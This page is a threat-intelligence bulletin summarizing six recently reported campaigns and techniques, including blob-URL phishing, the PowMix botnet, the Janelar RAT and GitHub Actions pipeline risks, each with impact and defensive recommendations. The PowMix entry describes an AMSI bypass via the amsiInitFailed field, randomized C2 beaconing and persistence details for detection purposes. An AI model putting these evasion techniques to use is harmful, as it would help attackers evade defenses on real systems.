Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
🚩 Blob URL Phishing Evades Detection by Hiding Malicious Content in Browser Memory
ANY.RUN reported on a phishing technique that abuses blob URLs to evade traditional detection mechanisms. Instead of hosting malicious content on external domains, attackers generate phishing pages directly within the victim’s browser using JavaScript, creating “blob:” URLs that do not point to a typical web address. The attack typically begins with a phishing email containing a link or attachment that executes JavaScript in the browser. This script dynamically generates a phishing page in memory, often mimicking legitimate login portals. Because the content is not hosted on a remote server in the traditional sense, security tools that rely on URL reputation or domain analysis may fail to detect the threat. Blob-based phishing also limits forensic visibility, as the malicious content does not persist as a standard web resource. This makes it harder for defenders to analyze and block the attack using conventional methods such as URL filtering or domain takedowns.
Impact: This technique enables attackers to steal credentials while bypassing many traditional phishing detection controls. Users may be presented with convincing login pages that appear legitimate, increasing the likelihood of credential compromise. The lack of a detectable external domain reduces opportunities for early detection and response.
Recommendation: Organizations should implement browser-based protections that detect suspicious script execution and dynamic content generation. Monitor for abnormal use of blob URLs and JavaScript-driven page creation. Deploy advanced phishing detection that focuses on behavior rather than domain reputation. Educate users to be cautious of unexpected login prompts, even when URLs appear unusual or lack a standard domain. Strengthen endpoint visibility to capture in-browser activity associated with phishing attempts.
🚩 Sapphire Sleet Targets macOS with Sophisticated Lure-to-Compromise Intrusion Chain
Microsoft reported in April 2026 on a macOS-focused intrusion campaign conducted by the threat actor Sapphire Sleet. The operation uses targeted social engineering lures to trick users into executing malicious payloads, leading to full system compromise. The campaign highlights a growing focus on macOS environments, particularly among high-value targets. The attack begins with carefully crafted lures that convince users to download and execute malicious files disguised as legitimate applications or updates. Once executed, the malware establishes persistence and initiates communication with command-and-control (C2) infrastructure. The intrusion chain includes multiple stages designed to evade detection, maintain access, and enable follow-on actions such as data collection and remote command execution. Sapphire Sleet leverages native macOS functionality and blends malicious activity with legitimate processes, reducing visibility for traditional security tools. The campaign demonstrates strong operational discipline, using staged payload delivery and controlled execution to minimize exposure.
Impact: Successful compromise results in persistent access to macOS systems, enabling data exfiltration, credential theft, and further lateral movement. The use of social engineering and trusted-looking applications increases the likelihood of user execution, while stealth techniques extend dwell time. Organizations with macOS endpoints face increased risk, particularly if visibility into endpoint behavior is limited.
Recommendation: Organizations should restrict execution of untrusted applications and enforce application allowlisting on macOS devices. Monitor for unusual process behavior, persistence mechanisms, and outbound connections to unknown infrastructure. Implement endpoint detection and response (EDR) solutions capable of detecting macOS-specific threats. Educate users on targeted phishing and software download risks, especially for unsolicited or unexpected applications. Strengthen visibility into macOS environments and treat them as equal risk to Windows systems in enterprise security strategies.
🚩 PowMix Botnet Targets Czech Workforce Using Compliance-Themed Lures and Randomized C2 Beaconing
Cisco Talos disclosed PowMix, a previously undocumented botnet targeting Czech organizations since December 2025 through phishing campaigns using compliance-themed lure documents impersonating EDEKA brand and Czech Data Protection Act regulatory frameworks. The campaign targets human resources, legal, recruitment agencies, and job seekers across IT, finance, and logistics sectors using decoy documents containing compensation data and legitimate legislative references. PowMix shares tactical overlaps with the ZipLine campaign reported in August 2025, including ZIP-based payload concealment, Windows scheduled task persistence, CRC32-based Bot ID generation, and abuse of herokuapp[.]com for command and control infrastructure. The attack begins with malicious ZIP files containing Windows shortcut files triggering PowerShell loader scripts that copy ZIP contents to ProgramData folders, bypass AMSI using reflection techniques setting amsiInitFailed field to true, extract embedded payloads using hardcoded markers like zAswKoK as delimiters, and execute PowMix botnet directly in memory using Invoke-Expression commands. PowMix employs randomized beaconing intervals between 0-261 seconds initially and 1,075-1,450 seconds subsequently using Get-Random PowerShell commands to evade network signature detection, embedding encrypted heartbeat data and unique victim identifiers into C2 URL paths mimicking legitimate REST API URLs.
Impact: PowMix generates unique Bot IDs by processing victim machine ProductID from registry key HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion through CRC32-style checksum functions, using these IDs to establish persistence via Windows scheduled tasks with names appearing as random hexadecimal strings like “289c2e236761” triggered daily at 11:00 a.m. The botnet creates Global mutexes named “Global[BotID]” visible across all user sessions preventing multiple instances from running simultaneously. C2 communication mimics legitimate web browser traffic by establishing Chrome User-Agent headers, configuring Accept-Language and Accept-Encoding headers, and utilizing GetSystemWebProxy API with DefaultCredentials to adopt host machine proxy settings and authenticate using logged-in user session tokens.
Recommendation: Monitor for Windows scheduled tasks with random hexadecimal names executing at 11:00 a.m. daily, particularly tasks launching explorer.exe with LNK file arguments from ProgramData directories. Block network connections to herokuapp[.]com infrastructure used for command and control operations. Detect AMSI bypass attempts through reflection techniques targeting AmsiUtils class and amsiInitFailed field modifications. Implement monitoring for PowerShell processes spawned by explorer.exe with suspicious command-line arguments including references to ProgramData paths and ZIP file extraction. Review PowerShell script execution logs for Invoke-Expression commands with Out-Null redirects and $VerbosePreference variable manipulations. Block identified XOR encryption keys and monitor for network traffic mimicking REST API patterns with embedded encrypted data in URL paths rather than query strings or POST bodies.
🚩 “Phantom in the Vault” Attack Targets Secrets in Memory to Bypass Traditional Security Controls
Elastic Security Labs reported in April 2026 on a technique dubbed “Phantom in the Vault,” where attackers target sensitive secrets directly in memory rather than stealing them from disk or configuration files. The research highlights how modern applications and vaulting solutions protect secrets at rest and in transit, but still expose them temporarily in plaintext within application memory during runtime. Attackers exploit this gap by dumping process memory or injecting into running applications to extract credentials, API keys, and tokens while they are actively in use. This approach bypasses traditional protections such as encryption, secrets managers, and secure storage mechanisms because the data is accessed after it has already been decrypted for legitimate use. The technique is particularly effective in cloud-native and containerized environments, where applications frequently retrieve secrets dynamically from vaults. Once accessed, these secrets can be reused to authenticate to services, escalate privileges, or move laterally across infrastructure.
Impact: This technique enables attackers to bypass standard credential protection mechanisms and gain access to high-value secrets without triggering traditional detection controls. Compromise of these secrets can lead to unauthorized access to cloud services, databases, and internal systems. Because the activity occurs within legitimate processes, it is more difficult to detect and may result in prolonged attacker presence.
Recommendation: Organizations should implement runtime security controls that monitor for abnormal memory access, process injection, and credential harvesting behavior. Limit the exposure window of sensitive secrets by using short-lived tokens and just-in-time access mechanisms. Enforce least privilege for applications and services accessing secrets. Monitor for unusual access patterns to vault services and correlate them with endpoint activity. Treat in-memory secrets as a critical attack surface and extend detection capabilities beyond traditional storage protections.
🚩 Janelar RAT Targets Financial Institutions with Stealthy Remote Access and Credential Theft
Kaspersky reported in April 2026 on a financial threat in Latin America involving a remote access trojan (RAT) known as Janelar. The malware is designed to target financial institutions and their customers, using phishing and social engineering techniques to gain initial access. Once executed, Janelar establishes persistent remote control over the infected system. The malware operates by injecting itself into legitimate processes and maintaining communication with command-and-control (C2) infrastructure to receive instructions. It is capable of monitoring user activity, capturing credentials, and interacting with financial applications. Its design allows attackers to observe and manipulate sessions in real time, enabling fraudulent transactions and account takeover. Janelar is tailored for financial targeting, focusing on banking systems and user interactions with financial platforms. The malware’s ability to blend into legitimate processes and maintain persistent access increases its effectiveness and reduces detection likelihood.
Impact: Successful infection enables attackers to steal banking credentials, hijack sessions, and perform unauthorized financial transactions. This can lead to direct financial loss, fraud, and reputational damage for both users and financial institutions. The malware’s persistence and stealth increase the likelihood of prolonged compromise.
Recommendation: Organizations should strengthen endpoint detection to identify process injection and abnormal behavior in financial applications. Monitor for suspicious outbound connections to unknown infrastructure and unusual session activity. Implement multi-layered fraud detection that includes device and session monitoring. Educate users on phishing risks, particularly those targeting financial services. Enforce strong authentication controls and limit exposure of sensitive financial operations to compromised endpoints.
GitHub Actions Misconfigurations Expose CI/CD Pipelines to Secret Theft and Code Injection
Wiz reported in April 2026 on widespread security risks in GitHub Actions pipelines, where misconfigurations can allow attackers to steal secrets, inject malicious code, or compromise software supply chains. The research highlights that CI/CD workflows often have excessive permissions, insecure triggers, and insufficient validation of external inputs—creating opportunities for abuse. Attackers can exploit workflows that run on untrusted events (e.g., pull requests from forks) to execute malicious code within the pipeline. If secrets or tokens are exposed to these workflows, they can be exfiltrated and reused to access repositories, cloud environments, or deployment systems. Additional risks include misuse of self-hosted runners, where attackers can gain deeper access to internal infrastructure. The issue is not a single vulnerability but a combination of insecure design patterns and default configurations. Common weaknesses include over-permissioned tokens, lack of isolation between workflows, and insufficient validation of third-party actions. These gaps make CI/CD pipelines a high-value target for attackers seeking to compromise development and production environments.
Impact: Compromise of GitHub Actions pipelines can lead to theft of sensitive credentials, unauthorized code changes, and downstream supply chain attacks. Attackers may gain access to production systems, cloud infrastructure, or customer data. Because CI/CD pipelines are trusted components of the development process, compromises can propagate widely and remain undetected.
Recommendation: Organizations should enforce least privilege for GitHub Actions tokens and restrict access to secrets based on workflow context. Avoid exposing secrets to workflows triggered by untrusted sources such as forked repositories. Validate and pin third-party actions to trusted versions or commit hashes. Isolate self-hosted runners and restrict their network access. Monitor pipeline activity for unusual execution patterns and implement logging and auditing for all CI/CD operations. Treat CI/CD pipelines as critical infrastructure and apply the same security controls as production systems.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.